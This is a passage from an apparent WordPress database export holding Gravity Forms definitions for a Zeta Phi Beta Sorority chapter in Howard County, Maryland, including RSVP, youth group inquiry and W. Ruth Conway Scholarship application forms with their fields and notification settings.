Size\",\"noDuplicates\":\"\",\"size\":\"medium\",\"type\":\"select\",\"postCustomFieldName\":\"\",\"displayAllCategories\":false,\"displayCaption\":\"\",\"displayDescription\":\"\",\"displayTitle\":\"\",\"inputType\":\"\",\"rangeMin\":\"\",\"rangeMax\":\"\",\"calendarIconType\":\"\",\"calendarIconUrl\":\"\",\"dateType\":\"\",\"dateFormat\":\"\",\"phoneFormat\":\"\",\"addressType\":\"\",\"defaultCountry\":\"\",\"defaultProvince\":\"\",\"defaultState\":\"\",\"hideAddress2\":\"\",\"hideCountry\":\"\",\"hideState\":\"\",\"inputs\":null,\"nameFormat\":\"\",\"allowedExtensions\":\"\",\"captchaType\":\"\",\"pageNumber\":1,\"captchaTheme\":\"\",\"simpleCaptchaSize\":\"\",\"simpleCaptchaFontColor\":\"\",\"simpleCaptchaBackgroundColor\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"enablePrice\":\"\",\"basePrice\":\"\",\"choices\":[{\"text\":\"N\\/A\",\"value\":\"N\\/A\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Small\",\"value\":\"Small\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Medium\",\"value\":\"Medium\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Large\",\"value\":\"Large\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"XL\",\"value\":\"XL\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"XXL\",\"value\":\"XXL\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"XXXL\",\"value\":\"XXXL\",\"isSelected\":false,\"price\":\"\"}],\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"formId\":2,\"descriptionPlacement\":\"below\"}],\"id\":2,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"cssClass\":\"\",\"enableHoneypot\":\"\",\"enableAnimation\":\"\",\"limitEntries\":\"1\",\"limitEntriesCount\":\"80\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":\"\",\"scheduleStart\":\"\",\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEnd\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":\"\",\"requireLoginMessage\":\"\"}','a:8:{i:0;s:3:\"1.3\";i:1;s:3:\"1.6\";i:2;s:1:\"2\";i:3;s:1:\"3\";i:4;s:1:\"4\";i:5;s:1:\"5\";i:6;s:1:\"6\";i:7;s:1:\"7\";}','{\"52f97e40e8096\":{\"id\":\"52f97e40e8096\",\"name\":\"Default Confirmation\",\"isDefault\":\"1\",\"type\":\"message\",\"message\":\"Thanks for your RSVP. We look forward to seeing you at the event.\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\",\"disableAutoformat\":\"\",\"conditionalLogic\":[]}}','{\"52f97e40ddc88\":{\"id\":\"52f97e40ddc88\",\"to\":\"{admin_email}\",\"name\":\"Admin Notification\",\"event\":\"form_submission\",\"toType\":\"email\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\"}}'),(3,'{\"title\":\"W. Ruth Conway Scholarship Recommendation Form\",\"description\":\"\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[],\"version\":\"2.0.6\",\"id\":3}',NULL,'{\"57ddda71e1053\":{\"id\":\"57ddda71e1053\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thanks for contacting us! We will get in touch with you shortly.\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"}}','{\"57ddda71d9480\":{\"id\":\"57ddda71d9480\",\"to\":\"{admin_email}\",\"name\":\"Admin Notification\",\"event\":\"form_submission\",\"toType\":\"email\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\"}}'),(4,'{\"title\":\"ZEN\",\"description\":\"\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[{\"type\":\"name\",\"id\":5,\"label\":\"Name\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"nameFormat\":\"advanced\",\"inputs\":[{\"id\":\"5.2\",\"label\":\"Prefix\",\"name\":\"\",\"choices\":[{\"text\":\"Mr.\",\"value\":\"Mr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Miss\",\"value\":\"Miss\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Ms.\",\"value\":\"Ms.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Dr.\",\"value\":\"Dr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Prof.\",\"value\":\"Prof.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Rev.\",\"value\":\"Rev.\",\"isSelected\":false,\"price\":\"\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"5.3\",\"label\":\"First\",\"name\":\"\"},{\"id\":\"5.4\",\"label\":\"Middle\",\"name\":\"\",\"isHidden\":true},{\"id\":\"5.6\",\"label\":\"Last\",\"name\":\"\"},{\"id\":\"5.8\",\"label\":\"Suffix\",\"name\":\"\",\"isHidden\":true}],\"formId\":4,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"pageNumber\":1},{\"type\":\"email\",\"id\":2,\"label\":\"Email\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":4,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"emailConfirmEnabled\":\"\",\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"textarea\",\"id\":6,\"label\":\"Message\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":4,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"pageNumber\":1}],\"version\":\"2.1.2\",\"id\":4,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"subLabelPlacement\":\"below\",\"cssClass\":\"gf_left_half\",\"enableHoneypot\":true,\"enableAnimation\":false,\"save\":{\"enabled\":false,\"button\":{\"type\":\"link\",\"text\":\"Save and Continue Later\"}},\"limitEntries\":false,\"limitEntriesCount\":\"\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":false,\"scheduleStart\":\"\",\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEnd\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":false,\"requireLoginMessage\":\"\"}','','{\"587c793f86116\":{\"id\":\"587c793f86116\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thanks for contacting us! We will get in touch with you shortly.\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"}}','{\"587c793f85430\":{\"id\":\"587c793f85430\",\"to\":\"{admin_email}\",\"name\":\"Admin Notification\",\"event\":\"form_submission\",\"toType\":\"email\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\"},\"587c7b0681dc5\":{\"isActive\":true,\"id\":\"587c7b0681dc5\",\"name\":\"ZEN Coordinator\",\"service\":\"wordpress\",\"event\":\"form_submission\",\"to\":\"zen@zphiblgz.org\",\"toType\":\"email\",\"bcc\":\"\",\"subject\":\"ZEN Program Inquiry\",\"message\":\"Thank you for your inquiry. We will get back with you soon.\\r\\n\\r\\nSincerely,\\r\\n\\r\\nZeta Phi Beta Sorority, Inc.\\r\\nLambda Gamma Zeta Chapter of Howard County, MD\",\"from\":\"{admin_email}\",\"fromName\":\"\",\"replyTo\":\"\",\"routing\":null,\"conditionalLogic\":null,\"disableAutoformat\":false}}'),(5,'{\"title\":\"Youth Aux\",\"description\":\"Amicette\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[{\"type\":\"name\",\"id\":2,\"label\":\"Name\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"nameFormat\":\"advanced\",\"inputs\":[{\"id\":\"2.2\",\"label\":\"Prefix\",\"name\":\"\",\"choices\":[{\"text\":\"Mr.\",\"value\":\"Mr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Miss\",\"value\":\"Miss\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Ms.\",\"value\":\"Ms.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Dr.\",\"value\":\"Dr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Prof.\",\"value\":\"Prof.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Rev.\",\"value\":\"Rev.\",\"isSelected\":false,\"price\":\"\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"2.3\",\"label\":\"First\",\"name\":\"\"},{\"id\":\"2.4\",\"label\":\"Middle\",\"name\":\"\",\"isHidden\":true},{\"id\":\"2.6\",\"label\":\"Last\",\"name\":\"\"},{\"id\":\"2.8\",\"label\":\"Suffix\",\"name\":\"\",\"isHidden\":true}],\"formId\":5,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"select\",\"id\":4,\"label\":\"Subject\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"Interested in Amicette Youth Group\",\"value\":\"Interested in Amicette Youth Group\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Interested in partnering with LGZ youth groups\",\"value\":\"Interested in partnering with LGZ youth groups\",\"isSelected\":false,\"price\":\"\"}],\"formId\":5,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"email\",\"id\":3,\"label\":\"Email\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":5,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"emailConfirmEnabled\":\"\",\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"textarea\",\"id\":1,\"label\":\"Message\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":5,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"form_id\":\"\",\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false}],\"version\":\"2.1.2\",\"id\":5,\"useCurrentUserAsAuthor\":true,\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null}','','{\"5893c0e57ecd9\":{\"id\":\"5893c0e57ecd9\",\"name\":\"Default Confirmation\",\"isDefault\":true,\"type\":\"message\",\"message\":\"Thanks for contacting us! We will get in touch with you shortly.\",\"url\":\"\",\"pageId\":\"\",\"queryString\":\"\"}}','{\"5893c0e57e745\":{\"id\":\"5893c0e57e745\",\"to\":\"{admin_email}\",\"name\":\"Admin Notification\",\"event\":\"form_submission\",\"toType\":\"email\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\"}}'),(6,'{\"title\":\"W. Ruth Conway Scholarship Application\",\"description\":\"Complete this application in its entirety for the 2020 W. Ruth Conway Scholarship. The deadline for this application is March 29, 2020. Once this application is started, your application can be edited for up to 30 days, using the personalized URL provided. Only complete applications received by the deadline will be considered. Good Luck!\",\"labelPlacement\":\"top_label\",\"descriptionPlacement\":\"below\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\"},\"fields\":[{\"type\":\"section\",\"id\":3,\"label\":\"Basic Information\",\"adminLabel\":\"\",\"isRequired\":false,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"displayOnly\":true,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1},{\"type\":\"name\",\"id\":18,\"label\":\"Name\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"nameFormat\":\"advanced\",\"inputs\":[{\"id\":\"18.2\",\"label\":\"Prefix\",\"name\":\"\",\"choices\":[{\"text\":\"Mr.\",\"value\":\"Mr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Miss\",\"value\":\"Miss\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Ms.\",\"value\":\"Ms.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Dr.\",\"value\":\"Dr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Prof.\",\"value\":\"Prof.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Rev.\",\"value\":\"Rev.\",\"isSelected\":false,\"price\":\"\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"18.3\",\"label\":\"First\",\"name\":\"\"},{\"id\":\"18.4\",\"label\":\"Middle\",\"name\":\"\",\"isHidden\":true},{\"id\":\"18.6\",\"label\":\"Last\",\"name\":\"\"},{\"id\":\"18.8\",\"label\":\"Suffix\",\"name\":\"\",\"isHidden\":true}],\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"pageNumber\":1,\"displayOnly\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false},{\"type\":\"address\",\"id\":19,\"label\":\"Address\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"addressType\":\"international\",\"inputs\":[{\"id\":\"19.1\",\"label\":\"Street Address\",\"name\":\"\"},{\"id\":\"19.2\",\"label\":\"Address Line 2\",\"name\":\"\"},{\"id\":\"19.3\",\"label\":\"City\",\"name\":\"\"},{\"id\":\"19.4\",\"label\":\"State \\/ Province\",\"name\":\"\"},{\"id\":\"19.5\",\"label\":\"ZIP \\/ Postal Code\",\"name\":\"\"},{\"id\":\"19.6\",\"label\":\"Country\",\"name\":\"\"}],\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"defaultCountry\":\"United States\",\"defaultProvince\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"defaultState\":\"\",\"enableCopyValuesOption\":\"\",\"copyValuesOptionDefault\":\"\",\"copyValuesOptionLabel\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"text\",\"id\":4,\"label\":\"Date of Birth (mm-dd-yy)\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"email\",\"id\":21,\"label\":\"Email\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"emailConfirmEnabled\":false,\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"phone\",\"id\":20,\"label\":\"Phone\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"phoneFormat\":\"standard\",\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"form_id\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"select\",\"id\":10,\"label\":\"What school do you currently attend?\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"Atholton High School\",\"value\":\"Atholton High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Centennial High School\",\"value\":\"Centennial High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Glenelg High School\",\"value\":\"Glenelg High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Hammond High School\",\"value\":\"Hammond High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Howard Community College\",\"value\":\"Howard Community College\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Howard High School\",\"value\":\"Howard High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Long Reach High School\",\"value\":\"Long Reach High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Marriotts Ridge High School\",\"value\":\"Marriotts Ridge High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Mt. Hebron High School\",\"value\":\"Mt. Hebron High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Oakland Mills High School\",\"value\":\"Oakland Mills High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Reservoir High School\",\"value\":\"Reservoir High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"River Hill High School\",\"value\":\"River Hill High School\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Wilde Lake High School\",\"value\":\"Wilde Lake High School\",\"isSelected\":false,\"price\":\"\"}],\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"select\",\"id\":27,\"label\":\"How did you hear about this scholarship?\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"choices\":[{\"text\":\"BSAP Advisor\",\"value\":\"BSAP Advisor\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"HCC Women of Color Program\",\"value\":\"HCC Women of Color Program\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"School Counselor\\/Advisor\",\"value\":\"School Counselor\\/Advisor\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Friend\\/Family Member\",\"value\":\"Friend\\/Family Member\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Church Bulletin\",\"value\":\"Church Bulletin\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Newsletter\",\"value\":\"Newsletter\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Lambda Gamma Zeta (LGZ) Website\",\"value\":\"Lambda Gamma Zeta (LGZ) Website\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Social Media\",\"value\":\"Social Media\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Other\",\"value\":\"Other\",\"isSelected\":false,\"price\":\"\"}],\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePrice\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"text\",\"id\":28,\"label\":\"If answer above was \'other\', please explain. (Otherwise, type N\\/A)\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"\",\"inputs\":null,\"formId\":6,\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"visibility\":\"visible\",\"noDuplicates\":false,\"defaultValue\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"failed_validation\":\"\",\"productField\":\"\",\"enablePasswordInput\":\"\",\"maxLength\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"displayOnly\":\"\"},{\"type\":\"section\",\"id\":8,\"label\":\"Academic & Community 